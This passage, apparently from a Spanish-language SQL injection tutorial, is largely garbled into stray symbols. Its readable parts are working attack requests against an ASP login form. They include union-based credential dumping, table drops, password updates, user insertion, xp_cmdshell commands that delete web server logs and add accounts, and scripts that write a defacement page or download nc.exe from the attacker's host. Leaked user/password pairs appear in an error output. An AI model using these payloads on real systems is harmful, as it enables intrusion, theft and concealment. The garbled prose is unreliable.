! " * # EF& " ) " 7 " .
" "
29. C
5 9 " " . ) " " 6 " "
( " 4 "& & " +
; " " 6 " 4 < + 7 " * 9
. " . "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 82
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+union+select+sum(UID)%2C1%2C1%2C1+from+usu
arios--&txtPassword=Angel
Y Y
Y H 9 6 " >! "" >
Y * . "
Y
H + L " " E ,F& & & * " "00
6 ( "& . 4 " " = 1
6 !:#; " " 6 )4 6 & ) " "
" . <
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]The sum or average aggregate operation cannot take
a nvarchar data type as an argument.
/Login.asp, line 85
- " " 6 9 6 :,-' " "
) " " & 4 6 "
" E> ,> " 4 F " " ) 9 "
I 8 " 9 " " " " 1:& 6 ( " "
& " 6 " " 9 = "
, ) 9 " " " " " )
) ( & "= & + )
30. 2
" " 6 "& " ) * " (
" " #$% ) " " ) " E! " " " )4 6
#$%KK& IIF
8 "& " " " " " " &
" " " " " " #$% 1 :1& 9 4
" # + " " " & "
) ) " ( & ; !: ,8 ,5;: 9
" " " 9 " . " "
! " " . & 9 " 9 " " " + I
:M& < ' " 5 + " < =" >5 6 #$%
4 ` a>& #$% ># > 6
* & 6 " " & #$% " <
* " " 4 " 9 " " " " " " "
" " " 4 " * 9 " 4 " +
> ,>
8" " 4 " 4 6 9 " " 1H5 ' 5 EA " "
" " F " 6 #$% " " >9 4 > 7 " 9
. # 1H5 ' 5
- & . " " 6 " 6 7 " . " " " +
" " "& " . ) ) " "
#$% ! . * & )" 6 " 9 " 6
1 &( ! (!
# 5 :#
4 # #
" " " # )!% #,
" " " . " ,
" " " ! ) ! *
" " " ! * M
" " " ! * "
" " " ! <# "
" " " ! <1
" " " ! M
" " " % " # "
" " " ,
" " " , M
" " , E1 ) " F
" " #
" " !G# E' " D F
8
' 6 & " * * " ( " )
"& " " + " " "& . " " "
6 " < " ! & " > .
" D > > . > " E! .J F 9 "
& " " "& " " ) " 9 " .
" " " ) " ) " " " " ) "& + " "
" 6 " " > >& 9 ;:,5 * *
6 " )4 6 & b 1;5 >86 "&
, " ) + 8 > . " " " " 4
. " , & " & E% " 9
) 9 F . . 9 " +
" "
31. 2
4; ! * #! ! !< !& ! (!
6 ( #$%& (
" " " . " * ) "
" )4 6 & ( . " " 7 " 9 " ) "
= (! , 8 .=
# . "& >) " > ) " " "
. & " " 9 6 ) "
" " A=4 " 9 * . " ) *
* 4 . " " "" ) " " 6 &
( 7 " " " "
> $6 3 / (! 6#; !
% " " " & " ( *
#$% . ) " 6 " 1;: 9 " .
" . " E% 9 " * 6 " 6 " ( F *
* " 6 " " " , + !G#
H 6 " " " F + 6 " * 9 ) =
6 !:#; +
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27+declare+@aux+varchar%288000%29+set+@aux%3D
%27%27+select+@aux%3D@aux+%2B+UID%2B%27/%27%2BPWS%2B%27%3
B%27+from+usuarios+where+UID%3E@aux+select+@aux+as+aux+in
to+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
32. 2
H + L < 6 EB F " <VLL "
<V <[ [L L[ "[L]L* " " U < " < " <
< W
-> $6 3 , 8 . ! (! 6#; !
6 ( " " & " ) " +
#8%8'; ) ( 7
" "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 76
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27union+select+aux%2C1%2C1%2C1+from+xtmp--
&txtPassword=Angel
Y Y
H 9 6 " Y
>! "" > * Y
. " Y
H + "L " <& & & * < 00
) ( " !:#; * & 6 :,-' 6 6
" " ) " 4 " * . ) " .
* * " " "
Login de Usuarios Registrados
Microsoft OLE DB Provider for ODBC Drivers error
'80040e07'[Microsoft][ODBC SQL Server Driver][SQL
Server]Syntax error converting the varchar value
'Danyr2/pepe;THEMA/M1703;CIELORIANO/daniel;ALELARRAINP/14
05;SANDRA/4484188;0001/13119695;AsdrubalCh/1173;beatrizay
ala/10338154;maria_perez/12345;batv/peresosita;susy/susyk
a;Mireya_Salazar/gabriela;MVidales/male;AngelicaS/chainy;
33. 22
carla/cardie;MonicaA/amorcito;aliciafalcon/baby;dayana/ne
ne;Luz_d/carmen;mguevara/martha;Tiatere1/lima27;CMorena/2
11095;victor...
/Login.asp, line 85
2> $6 3 4! & ! (! 6#; !
6 ( ) " " " ) " "& )
( " & " . +
, :!& " " " . 4
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 53
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bdrop+table+xtmp--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > * . "
Y
H + L] ) < 00
- 6! !
; " " " " " " " " . & " " "
" 6 " " " . 6 ) " " " " "&
"& 9 ( 6 " 9 . * &
" " 5 " " " "
" ) " " 9 " * & . .
. " " " ) " "
$+6 4
H " 4 9 " " " !:#; (
"" " . " " 6= + "
!,5;8
34. 23
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 103
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Bupdate+usuarios+set+pws%3D%27NuevoPass%2
7+where+uid%3D%27Carla%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L " " " "VL1 6 ! ""L VL' L00
+4 4 4
# & . " * " !:#; & . "
+ 9 E5 9 " *
9 " " #$% # 6 F . "
H + 'delete from usuarios where UID='Usuario'--
1 4
$ " 1#8 ;& ) " 9 " "
4 & " " 9 &
" " " "& " " 6 " 6 " "
" " 9 + . " " " !
& " " ) ( . & +
4 " & . " E' " 4
KKKF " = " ) " . 9 =
9 " " ( " 7 & 6 "
" " "& + . ( 9 " "
" )
35. 2?
5"= " & " 9 < " " " " 1#8 ; "
" 9 " ) " & 4 * " + &
" . = 9 " " " "
( " !:#; 6= :)6 7< " +
. * 9 " + . &
" ) " " " " + " " " 6 " "
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 113
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=%27%3Binsert+into+usuarios+values+%28%27MyUser
%27%2C%27MyPassword%27%29--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + L] " " " 6 " EL + " L&L +! "" LF00
% & & ! !
" . " . " ! " )
( . " 7 " " " #$% 4 " " ( "
" " " * " * &
) " 6 " II * 6 1: " " .
& " " * " 9 " * #$% # 6
" >8< # ! "> "
< "
$ # ?4; $ #
% " " < " " " & ,%%L" 9 < " "
) " " " " & " "
" " 8< " " " " < "&
6 " #0#$%& " " ) *
" 5 . " "& #0#$% ) " ) .
36. 2@
" " " < " "& "
" & * " ) ) " " " 9 "
5 ) " * " "& " " " " "
" " " " " " 9 " + " (
" " " < Q "
N Q " " 4 " " " 6 6= #$%
> " > " K 6 " ( = " " " " . "
4 " " ;;!
POST /Login.asp?validar=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
image/pjpeg,application/x-shockwave-flash, */*
Referer: http://www.xxxxxxxxxx.com/Login.asp?validar=2
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.0)
Host: www.xxxxxxxxxx.com
Content-Length: 90
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDQQGQQGBW=OBJADBEDBPHAHOMMOCBFNKDA;
xxxxxxxxxx=COUNTRYNAME=Argentina
txtUsuario=Ups%27%3BEXEC+master.dbo.xp_cmdshell%27cmd.exe
+dir+c%3A%27--&txtPassword=Angel
Y Y
Y H 9 6 "
Y >! "" > *
Y . "
Y
H + "L]8N8' " ) < Q " L < L00
:M ) " " " + * )
9 " 4 & " ) 4 " #5
E 6 " " " ) " ( < Q " F
, " * " " )" 6 " " "
= " ) " * " 6 > > . 9 "
) " * . " 6 " E8 " " & & & " & F
5 4 & 6 " . " " * " 9 "
" = 6 " " < Q " E/ " 1
) 4 " ) " " = "F
37. 2
! "
EXEC master..xp_cmdshell 'dir c:inetpubwwwroot'
! 6 9 6
EXEC master..xp_cmdshell 'type
c:inetpubwwwrootalguna_pagina.asp'
! " )
EXEC master..xp_cmdshell 'copy c:winntsystem32cmd.exe
c:inetpubwwwrootchroot.exe'
! ) "
EXEC master..xp_cmdshell 'DIR
c:winntsystem32logfilesw3svc1'
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicación en
World Wide Web"'
EXEC master..xp_cmdshell 'del
c:winntsystem32logfilesw3svc1
filelog.log'
EXEC master..xp_cmdshell 'NET START "Servicio de
publicación en
World Wide Web"'
! 6 "
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
! " 6 G "
EXEC master..xp_cmdshell 'NET USER username password'
:M& " ) . " " >8< # ! ">&
" . " " " " >1
8< ">& " " ) 7 ) " & 4 "
" " " " # " + "
'exec master..sp_addlogin MyUser, MyPass
9 " . " " ) 6 & " "
; " * & . . " " ) " 9
" ) & " " " " " >#
! "> + >8< # ! "> 9 ) = " " ) "
" " " ! " " " " " & " * " +
= #0#$% # 6 " * " "
" " + " " " 6 " * "
38. 2B
" Q
" Q
" Q " +
" Q * .
" Q " 6 )
" Q .
< Q ) "M
< Q .
< Q .
< Q . M +
< Q . 6
< Q" 6
< Q "
< Q
< Q 6 .
- $ % + )
% " & * " & " " " +
" " ) " " " + 7 " . " " #$%
4 & * + " ' " ) 4
) " " & 4 " " 9
* ( " " " ( 4
" > * >
% " 7 "& 9 " ( 67" #$% E$ +
+( 9 9 " < ) " " #$% 6=
:,-'F& " 9 " " #5& " )
" " 322& ) " . *
9 " # ) & " . " + " #$%&
. " .
- " " & 9 4 * "
1 & " . " > . (( # + ; >& "
M <& < " " 7 "
6 " H " . " * . "
----- Extracto ------------------------------------------
[...] La idea es crear una pagina html o asp, si en
el sitio objetivo se encuentra activo y funciónando un
webserver [...]
declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out,
'c:web-hostingattajdidindex3.html', 1
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD>
<BODY text=black bgColor=#000000> <CENTER> <P><B>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT face=Arial color=#b4b58c size=7>Vosotros
</B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "--
></P>
<P></P> <CENTER> <P><B><FONT face=Arial
color=#b4b58c size=7>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros
vuestras
</B>WEB<B>s!!!</B></FONT></P></CENTER>
<P><BR><BR></P>'
39. 2C
exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV
align=center>
<CENTER> <TABLE cellSpacing=0 cellPadding=0
width=100 border=0>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY>
<TR> <TD bgColor=#d20000> </TD></TR>
<TR> <TD align=middle bgColor=#ffff00>'
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va
por vosotros!!!
</FONT></TD></TR> <TR> <TD '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'bgColor=#d20000> 
;</TD></TR><!--" "--
></TBODY></TABLE></CENTER></DIV> '
exec @ret=sp_oamethod @f, 'writeline', NULL,
'<P><BR><BR><BR><BR><BR></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00 size=5>
lagear & runlevel</FONT></P>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '<P
align=right>
<FONT face="Courier New" color=#00ff00
size=4>Recuerdos a
<B>N</B>9<B>Team</B></FONT>'
exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P
align=right>
<FONT face="Courier New" color=#00ff00 size=3>'
exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te
podemos
encontrar BreakICE?</FONT></P> <FONT color=black>"
</FONT>
</BODY></HTML>'
Para subir archivos.- Creamos un archivo get.txt para
utilizar luego ftp
declare @o int, @f int, @t int, @ret int
EXECUTE sp_oacreate 'scripting.filesystemobject', @o out
EXECUTE sp_oamethod @o, 'createtextfile', @f out,
'c:get.txt', 1
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user
anonymous'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get
nc.exe'
EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit'
EXECUTE master.xp_cmdshell 'FTP -s c:get.txt
NUESTROHOST'
o algo mas fácil si tenemos un tftp en nuestro host
EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET
c:mi_local_file c:remote_file'
40. 3
----- Extracto ------------------------------------------
:M& ) & ) " " ( " * "
" )4 " . " " " 6 " " #0#$% # 6 &
6 " *=" " 9 " ) " .
" " " 8 " " & " " Q + " Q 9 "
" . " )4 :%8 " " * #$%
# 6 E " 4 " . * "+" )4 F + " 7 "
" " . )4 6 " ) "
;
" Q . & c " &
)4 M : ;! ;
` & < a
;
" Q )4 M &
` & 6 : ;! ; a
` & ` V a ` : ;! ; a
` a a
" 3 , +
# ) " " " & 9 #0#$%
" ) " " 9 " 7" " " "& )
9 " . " " & " * " &
9 ) 4 .J 6 " " J " " ) "
7 " #$% 4
! " 9 " D " + #$% 9 6
" ) " " " ) < " 6
& + = " ) " " " " ( " E: ) = "
"IF & " + * " " "
) * " 6 " . & " " #$% + "
5 ) "
* . >; : G ) 5 # + ! 4 > "
" 7 . " " ) " " #$% 4 +
" ) " " " " "
0 *
# L 1;: : ;A %8L
' > >
% + = " " + ) = " " J " " "
41. 3
0 3 !
# )" " " ) "
1 :1 " )
H " " " E *Q* KF
1 " J " " "
0 +,-
# )" " " ) "
1 :1 " )
! " 5 "
1 " J " " "
0 $ .
# ':!S E8 " " F
# )" " " ) "
1 :1 " )
! " 5 "
J " " " " " ) "K
0
# )" " " ) "
1 :1 " )
! " 5 "
J " " " " " ) "K
" " " " " " " *
E< Q " & " Q " F
"@ % &
A . & 6 " . * % " " "
9 " " " * " ( ".
* & " " 6 ) " " #0#$% "
7 " 4 " "
' " " & " " & " "
. " . "& " " " " " ) ) )
" .
7 . " ( 6 # 6 ! M " "
6 " " 9 " " 6
7 . " ( " J " " " " 6
" " 9 " " 6
! 4 *=" " " " 6 " ) " "
8" ) ( ! = ' ( A " 6=
# * * " " < " " = " 8"
+ " ;'! 322 + ,! 323F
1 " " 6 " ) " " 6 ) " "
1 " " = & " 6 #$% " 6
" "
42. 3
! " " " . " . * . E, " 6 "
) " " " " . ( & M" )
* . F
H * 9 6 " " "
" " #0#$% # 6
8" ) ( " 6 . " "& " ) " " 9
( " " " "
8" ) ( 6 " " . 6 " * " *
E " " " . ) 0 " " "
* ( " M " " MF
8" ) ( "" * #5
# " 9 " . & " " "
* " . " 6 #0#$% 6 '
1 4 ) ) " " 6 " "
" " " " . " (
" . " H 6 ) "
" ) " " ' 9 " " " " " " "
" " >$ > " " " 9 " " . ) " "
"A % B !
#0#$% # 6 " " & + " " ) " 7 " +
6 " " 6 " . " . " " " * " " "
" . & 9 9 " ) " " " " " ) + + " ( "
. 6 ( " " " " ) 4
" " " " " 6 " " " .
' " * & " " 9 . "
6 " " " 6 & < " " ) " " "
" . + " " " " 9 + = " " "
6 " ) " & " ) < 7< " + " " 7 "
M . " ) #0#$% # 6
8 " " " . "& "
" + "* ( " " A " "&
" " + # 6 " ! M" = & * . " " " 6
" ) " "& " . * " *
6 " " . G " & " ) " " 6 " " "&
" " " " ) > .= " ) " .
" . > + " " " " ) " " . &
) = 6 " #$% 4 . *= 4
# ) * " " & 74 " 6 " "
* M . * " G " 8 " & "
" " * "& " " " " " + " " " . *
) = " . " " " "
6 ) " 6 " E; " " #0#$%F 8"
) " " " " 9 " . " D " " . * )
" . ( # #;8 5 G "
43. 32
' 6 G " 2& + " " " ) " 9 " "
" " ) " " " .
E5 ( " 5 "& , 6 " # . & 8A#& F "= ) 7
%81;: " * " ( " " "
" * & " " 9 " . ) "
" #0 #& #0#$%& # " " 8 !& " " ) ( "
* & " . & + 9
#:- 8 " " 6
5 " " 9 + "* " + 9 " )
" " " " " + " 6 " " & "
" " 7 " 5
" 6 " . " " 7 " #$% 4 & 6
9 6 " " > * " + % " ' ">
" " 9 " < 6
# " "& + " " <
5 " >5 . ! >
"C ) * # % & ! &
- M > M . 8< " G " > E #-1 B303B 022CB0@F
" M . M " Q QG "
"9 "9 Q 3
"9 " +
" * "9 6 6 " + "
" + " " #$% 4 G ! *
" " "
.Q#$%Q# 6 Q " .Q#$%Q 4 *
< . "" " 6 Q"9 Q 4 *
< . "" " Q 6 Q"9 Q 4 *
< . "" " 0#$% *
< . "" " M .0"9 0 "" " *
< . "" " 6 .Q ) " Q" + *
" " + 6 " ?,! 1 ! @8
" . " Q6 "9 "
"D !
M <
M " " + * " M M
M " " + . ' M " #9 )* (
44. 33
M " " + . 1; " " #9 M (
M " " + . G "9 <
M " " + . G "9 . (
M " " + + . ) 5 "0 0 @0) (
<< "
" " " * "
"
" M " " MQJ "
+ " ; "
" B % ! (
01 ( , :! " 9 " " )+ 1
0 " . II )+ 5 .
0' ' % . " " F )+ 6
0S " * " ) " "
" ) "I )+ 5 . 59 =
6. &
** " * . & " " 9 " "
= " * " " 6 = " " " " " " (
. 6 . (( # + ; &
" . " > > < 1 ) 9 " * " 9
= = & + 9 " ) " " "&
" * 9 . " " + 9 " < " ) " " "
" " " ) " " )
8 " . . & . ( " " " 6 " " " "
D " 1 + 6 9 " "* ( " "
" * . 9 " " ") ( " " "
" * "
; ) 7 . " = + # 9 " " " "
" #0#$%& . " " " " .
/ " 9 " 9 67" " " " " " + *
" " " #$% 4 E8" . O1 <
/ # + # * % d " " " J "KF
! & . " " 9 " . " " "
" " " " . * & < " 9 D
5 " >5 . ! >